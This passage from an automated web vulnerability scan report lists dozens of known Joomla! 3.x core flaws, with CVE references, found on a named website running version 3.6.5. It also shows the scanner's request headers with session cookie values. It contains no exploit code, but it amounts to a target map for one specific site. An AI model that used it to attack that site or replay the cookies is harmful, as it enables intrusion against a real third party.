the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Joomla! Core versions 3.x.x ranging from 3.0.0 and up to and including 3.9.27 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/856-20210701-core-xss-in-jform-rules-field.html
(https://developer.joomla.org/security-centre/856-20210701-core-xss-in-jform-rules-field.html)
CVE-2021-26035 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26035)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
104
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core 3.x.x Cross-Site Scripting (3.1.0 - 3.9.23)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An
attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of
the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Joomla! Core versions 3.x.x ranging from 3.1.0 and up to and including 3.9.23 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/838-20210103-core-xss-in-com-tags-image-parameters.html
(https://developer.joomla.org/security-centre/838-20210103-core-xss-in-com-tags-image-parameters.html)
CVE-2021-23125 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23125)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
105
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core 3.x.x Cross-Site Scripting (3.1.2 - 3.8.7)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An
attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of
the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Joomla! Core versions 3.x.x ranging from 3.1.2 and up to and including 3.8.7 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/736-20180508-core-possible-xss-attack-in-the-redirect-method.html
(https://developer.joomla.org/security-centre/736-20180508-core-possible-xss-attack-in-the-redirect-method.html)
CVE-2018-11328 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11328)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
106
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core 3.x.x Cross-Site Scripting (3.2.0 - 3.9.3)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An
attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of
the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Joomla! Core versions 3.x.x ranging from 3.2.0 and up to and including 3.9.3 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/772-20190301-core-xss-in-com-config-json-handler.html
(https://developer.joomla.org/security-centre/772-20190301-core-xss-in-com-config-json-handler.html)
CVE-2019-9712 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9712)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
107
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core 3.x.x Cross-Site Scripting (3.6.0 - 3.9.6)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An
attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of
the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Joomla! Core versions 3.x.x ranging from 3.6.0 and up to and including 3.9.6 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/784-20190602-core-xss-in-subform-field (https://developer.joomla.org/security-
centre/784-20190602-core-xss-in-subform-field)
CVE-2019-12766 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12766)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
108
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core 3.x.x Directory Traversal (3.0.0 - 3.9.24)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to a directory traversal vulnerability because it fails to sufficiently verify user-supplied input.
Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks. Joomla! Core
versions 3.x.x ranging from 3.0.0 and up to and including 3.9.24 are vulnerable.
Impact
Recommendation
References
https://github.com/HoangKien1020/CVE-2021-23132 (https://github.com/HoangKien1020/CVE-2021-23132)
https://developer.joomla.org/security-centre/846-20210306-core-com-media-allowed-paths-that-are-not-intended-for-image-
uploads.html (https://developer.joomla.org/security-centre/846-20210306-core-com-media-allowed-paths-that-are-not-
intended-for-image-uploads.html)
CVE-2021-23132 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23132)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
109
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core 3.x.x Directory Traversal (3.0.0 - 3.9.24)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to a directory traversal vulnerability because it fails to sufficiently verify user-supplied input.
Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks. Joomla! Core
versions 3.x.x ranging from 3.0.0 and up to and including 3.9.24 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/848-20210308-core-path-traversal-within-joomla-archive-zip-class.html
(https://developer.joomla.org/security-centre/848-20210308-core-path-traversal-within-joomla-archive-zip-class.html)
CVE-2021-26028 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26028)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
110
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core 3.x.x Information Disclosure (3.0.0 - 3.8.7)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to an information disclosure vulnerability. Attackers can exploit this issue to obtain sensitive
information that may help in launching further attacks. Joomla! Core versions 3.x.x ranging from 3.0.0 and up to and
including 3.8.7 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/732-20180504-core-installer-leaks-plain-text-password-to-local-user.html
(https://developer.joomla.org/security-centre/732-20180504-core-installer-leaks-plain-text-password-to-local-user.html)
CVE-2018-11325 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11325)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
111
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core 3.x.x Information Disclosure (3.0.0 - 3.9.19)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to an information disclosure vulnerability. Attackers can exploit this issue to obtain sensitive
information that may help in launching further attacks. Joomla! Core versions 3.x.x ranging from 3.0.0 and up to and
including 3.9.19 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/823-20200706-core-system-information-screen-could-expose-redis-or-proxy-
credentials.html (https://developer.joomla.org/security-centre/823-20200706-core-system-information-screen-could-expose-
redis-or-proxy-credentials.html)
CVE-2020-15698 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15698)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
112
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core 3.x.x Information Disclosure (3.1.0 - 3.8.7)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to an information disclosure vulnerability. Attackers can exploit this issue to obtain sensitive
information that may help in launching further attacks. Joomla! Core versions 3.x.x ranging from 3.1.0 and up to and
including 3.8.7 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/731-20180503-core-information-disclosure-about-unpublished-tags.html
(https://developer.joomla.org/security-centre/731-20180503-core-information-disclosure-about-unpublished-tags.html)
CVE-2018-11327 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11327)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
113
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core 3.x.x Information Disclosure (3.4.0 - 3.6.5)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to an information disclosure vulnerability. Attackers can exploit this issue to obtain sensitive
information that may help in launching further attacks. Joomla! Core versions 3.x.x ranging from 3.4.0 and up to and
including 3.6.5 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/690-core-information-disclosure.html (https://developer.joomla.org/security-
centre/690-core-information-disclosure.html)
CVE-2017-8057 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8057)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
114
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core 3.x.x Information Disclosure (3.6.0 - 3.9.12)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to an information disclosure vulnerability. Attackers can exploit this issue to obtain sensitive
information that may help in launching further attacks. Joomla! Core versions 3.x.x ranging from 3.6.0 and up to and
including 3.9.12 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/795-20191002-core-path-disclosure-in-phpuft8-mapping-files.html
(https://developer.joomla.org/security-centre/795-20191002-core-path-disclosure-in-phpuft8-mapping-files.html)
CVE-2019-18674 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18674)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
115
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core 3.x.x Local File Inclusion (3.0.0 - 3.9.25)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to a local file inclusion vulnerability because it fails to sufficiently verify user-supplied input.
Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. Joomla! Core
versions 3.x.x ranging from 3.0.0 and up to and including 3.9.25 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/851-20210402-core-inadequate-filters-on-module-layout-settings.html
(https://developer.joomla.org/security-centre/851-20210402-core-inadequate-filters-on-module-layout-settings.html)
CVE-2021-26031 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26031)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
116
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core 3.x.x Multiple Cross-Site Request Forgery Vulnerabilities (3.0.0 - 3.9.14)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to multiple cross-site request forgery vulnerabilities. Exploiting these issues may allow a remote
attacker to perform certain administrative actions and gain unauthorized access to the affected application; other attacks
are also possible. Joomla! Core versions 3.x.x ranging from 3.0.0 and up to and including 3.9.14 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/798-20200101-core-csrf-in-batch-actions.html
(https://developer.joomla.org/security-centre/798-20200101-core-csrf-in-batch-actions.html)
https://developer.joomla.org/security-centre/799-20200102-core-csrf-com-templates-less-compiler.html
(https://developer.joomla.org/security-centre/799-20200102-core-csrf-com-templates-less-compiler.html)
CVE-2020-8419 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8419)
CVE-2020-8420 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8420)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
117
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core 3.x.x Multiple Cross-Site Request Forgery Vulnerabilities (3.2.0 - 3.9.15)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to multiple cross-site request forgery vulnerabilities. Exploiting these issues may allow a remote
attacker to perform certain administrative actions and gain unauthorized access to the affected application; other attacks
are also possible. Joomla! Core versions 3.x.x ranging from 3.2.0 and up to and including 3.9.15 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/802-20200301-core-csrf-in-com-templates-image-actions.html
(https://developer.joomla.org/security-centre/802-20200301-core-csrf-in-com-templates-image-actions.html)
CVE-2020-10241 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10241)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
118
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core 3.x.x Multiple Cross-Site Scripting Vulnerabilities (3.0.0 - 3.8.7)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the
context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other
attacks. Joomla! Core versions 3.x.x ranging from 3.0.0 and up to and including 3.8.7 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/733-20180505-core-xss-vulnerabilities-additional-hardening.html
(https://developer.joomla.org/security-centre/733-20180505-core-xss-vulnerabilities-additional-hardening.html)
CVE-2018-11326 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11326)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
119
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core 3.x.x Multiple Cross-Site Scripting Vulnerabilities (3.0.0 - 3.9.3)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the
context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other
attacks. Joomla! Core versions 3.x.x ranging from 3.0.0 and up to and including 3.9.3 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/773-20190302-core-xss-in-item-title-layout.html
(https://developer.joomla.org/security-centre/773-20190302-core-xss-in-item-title-layout.html)
https://developer.joomla.org/security-centre/774-20190303-core-xss-in-media-form-field.html
(https://developer.joomla.org/security-centre/774-20190303-core-xss-in-media-form-field.html)
CVE-2019-9711 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9711)
CVE-2019-9714 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9714)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
120
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core 3.x.x Multiple Vulnerabilities (3.2.0 - 3.6.5)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to multiple vulnerabilities, including cross-site scripting and security bypass vulnerabilities. Exploiting
these issues could allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context
of the affected site, allowing the attacker to steal cookie-based authentication credentials, or to perform otherwise restricted
actions and subsequently upload swf files. Joomla! Core versions 3.x.x ranging from 3.2.0 and up to and including 3.6.5
are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/684-core-xss-vulnerability.html (https://developer.joomla.org/security-
centre/684-core-xss-vulnerability.html)
https://developer.joomla.org/security-centre/687-core-xss-vulnerability.html (https://developer.joomla.org/security-
centre/687-core-xss-vulnerability.html)
https://developer.joomla.org/security-centre/689-core-acl-violations.html (https://developer.joomla.org/security-centre/689-
core-acl-violations.html)
CVE-2017-7984 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7984)
CVE-2017-7987 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7987)
CVE-2017-7989 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7989)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
121
Request headers
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core 3.x.x Open Redirect (3.0.0 - 3.9.20)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to an open redirect vulnerability because the application fails to properly validate user-supplied input.
Exploiting this issue may allow attackers to redirect users to arbitrary web sites and conduct phishing attacks; other attacks
are also possible. Joomla! Core versions 3.x.x ranging from 3.0.0 and up to and including 3.9.20 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/825-20200802-core-open-redirect-in-com-content-vote-feature.html
(https://developer.joomla.org/security-centre/825-20200802-core-open-redirect-in-com-content-vote-feature.html)
CVE-2020-24598 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24598)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
122
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core 3.x.x Prototype Pollution (3.0.0 - 3.9.4)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to a prototype pollution vulnerability. Exploiting this issue may allow attackers to add or modify
existing properties of an "Object", when controlling part of it's structure. Joomla! Core versions 3.x.x ranging from 3.0.0 and
up to and including 3.9.4 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/779-20190403-core-object-prototype-pollution-in-jquery-extend.html
(https://developer.joomla.org/security-centre/779-20190403-core-object-prototype-pollution-in-jquery-extend.html)
CVE-2019-11358 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11358)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
123
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core 3.x.x Race Condition (3.0.0 - 3.8.7)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to a race condition, where a session which was expected to be destroyed would be recreated.
Attackers can exploit this issue to perform unauthorized actions. Joomla! Core versions 3.x.x ranging from 3.0.0 and up to
and including 3.8.7 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/735-20180507-core-session-deletion-race-condition.html
(https://developer.joomla.org/security-centre/735-20180507-core-session-deletion-race-condition.html)
CVE-2018-11324 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11324)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
124
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core 3.x.x Security Bypass (3.0.0 - 3.9.15)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to a security bypass vulnerability. Exploiting this issue may allow attackers to bypass intended
access restrictions and perform otherwise restricted actions. Joomla! Core versions 3.x.x ranging from 3.0.0 and up to and
including 3.9.15 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/805-20200304-core-identifier-collisions-in-com-users.html
(https://developer.joomla.org/security-centre/805-20200304-core-identifier-collisions-in-com-users.html)
CVE-2020-10240 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10240)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
125
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core 3.x.x Security Bypass (3.0.0 - 3.9.19)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to a security bypass vulnerability. Exploiting this issue may allow attackers to bypass intended
access restrictions and perform otherwise restricted actions. Joomla! Core versions 3.x.x ranging from 3.0.0 and up to and
including 3.9.19 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/821-20200704-core-variable-tampering-via-user-table-class.html
(https://developer.joomla.org/security-centre/821-20200704-core-variable-tampering-via-user-table-class.html)
CVE-2020-15697 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15697)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
126
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core 3.x.x Security Bypass (3.0.0 - 3.9.23)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to a security bypass vulnerability. Exploiting this issue may allow attackers to bypass intended
access restrictions and perform otherwise restricted actions. Joomla! Core versions 3.x.x ranging from 3.0.0 and up to and
including 3.9.23 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/836-20210101-core-com-modules-exposes-module-names.html
(https://developer.joomla.org/security-centre/836-20210101-core-com-modules-exposes-module-names.html)
CVE-2021-23123 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23123)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
127
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
